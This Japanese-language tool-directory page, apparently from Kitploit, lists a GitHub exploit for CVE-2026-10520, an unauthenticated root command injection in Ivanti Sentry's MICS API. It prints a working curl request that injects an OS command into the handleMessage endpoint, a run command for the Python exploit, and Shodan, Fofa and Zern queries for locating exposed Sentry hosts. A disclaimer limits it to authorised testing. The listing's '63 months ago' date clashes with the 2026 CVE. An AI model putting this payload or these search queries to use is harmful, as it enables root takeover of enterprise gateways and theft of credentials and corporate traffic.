Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-10520 — Ivanti SentryにおけるOSコマンドインジェクションを介したルートレベルRCE | Kitploit
ツール/GitHubGitHub/error-inside/cve-2026-10520
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

Ivanti SentryにおけるOSコマンドインジェクションを介したルートレベルRCE

リポジトリを見る
63ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-10520

Python CVSS License Educational

Ivanti Sentry(旧MobileIron Sentry)は、モバイルデバイスと企業バックエンドリソース(メール、SharePoint、内部Webアプリケーション)間のトラフィックをプロキシするエンタープライズセキュリティゲートウェイです。Mobile Device Management(MDM)ポリシーを適用し、暗号化されたモバイルセッションを終了し、エンタープライズアプリの展開のために証明書ベースの認証を発行します。Sentryインスタンスは通常、インターネットに公開されたポート8443上で動作し、MICS(Mobile Iron Configuration Service)管理APIを公開します。

CVE-2026-10520 は、Ivanti Sentry R10.5.2、R10.6.2、R10.7.1より前のバージョンに影響する認証不要のOSコマンドインジェクション脆弱性です(CVSSv3.1: 10 Critical、CISA KEVに掲載)。欠陥はMICS APIエンドポイント /mics/api/v2/sentry/mics-config/handleMessage にあり、URLエンコードされた message POST ボディを介してXMLラップされたシステムコマンドを、認証や入力検証なしで受け入れます。脆弱なエンドポイントに到達した攻撃者は、rootとして任意のOSコマンドを実行でき、ホストの完全な制御を取得します。これには、復号化されたエンタープライズトラフィック、保存された認証情報、管理対象の全モバイルデバイスデータが含まれます。

PoC

# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

使用方法

python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

リソース

  • OpenCVE — Ivanti SentryにおけるOSコマンドインジェクションによるルートレベルRCE
  • NIST — CVE-2026-10520 詳細
  • Ivanti Sentry — 公式製品ページ

免責事項

このリポジトリとその内容は、正当なセキュリティ研究、許可されたペネトレーションテスト、教育研究、防御目的のみに提供されています。本資料にアクセスまたは使用することにより、お客様の活動がすべての適用される法律に準拠していること、およびお客様が所有していないシステムに対してテストまたは適用する前に適切な許可を得ていることを確認する責任を負うものとします。

このプロジェクトの作成者およびメンテナは、この情報の適用に起因する損害、法的影響、または誤用について一切の責任を負いません。不正アクセス、悪意のある活動、または違法な目的での使用は明示的に禁止され、サポートされません。

責任を持って使用してください。法的に行動してください。自分が所有するシステム、または明示的な書面による許可を得たシステムのみをテストしてください。

著者

  • ErrorInside // SCT

ライセンス

SCT-PL

ツールをダウンロード